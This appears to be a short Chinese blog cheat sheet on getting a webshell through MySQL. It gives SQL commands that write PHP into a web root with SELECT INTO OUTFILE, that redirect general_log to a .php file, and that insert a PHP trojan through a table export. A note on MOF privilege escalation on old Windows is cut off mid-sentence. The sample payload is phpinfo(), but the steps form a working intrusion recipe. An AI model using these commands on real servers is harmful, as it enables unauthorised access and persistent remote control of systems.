♥喜欢请点个赞吧♥
mysql outfile导出webshell
条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法:show global variables like '%secure_file_priv%';
这个参数只能通过修改配置文件后重启mysql修改。
1.select '<?php phpinfo();?>' into outfile 'C:phpStudy/PHPTutorial/WWW/11.php'
2.新建一个表,创建一个空字段,在这个字段里插入php马,再导出
直接导出需要开启安全配置
secure_file_priv参数用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()(读取文件)
mysql日志获取webshell
查看:SHOW VARIABLES LIKE '%general%'
修改状态:set global general_log="ON";
修改储存位置:set global general_log_file='C:/phpStudy/PHPTutorial/WWW/11.php';
写马:select '<?php phpinfo(); ?>';
只需root权限即可
mof提权
MOF提权的条件要求十分严苛:
windows 03及以下版本
mysql启动身份具有权限去读写c:/windows/sy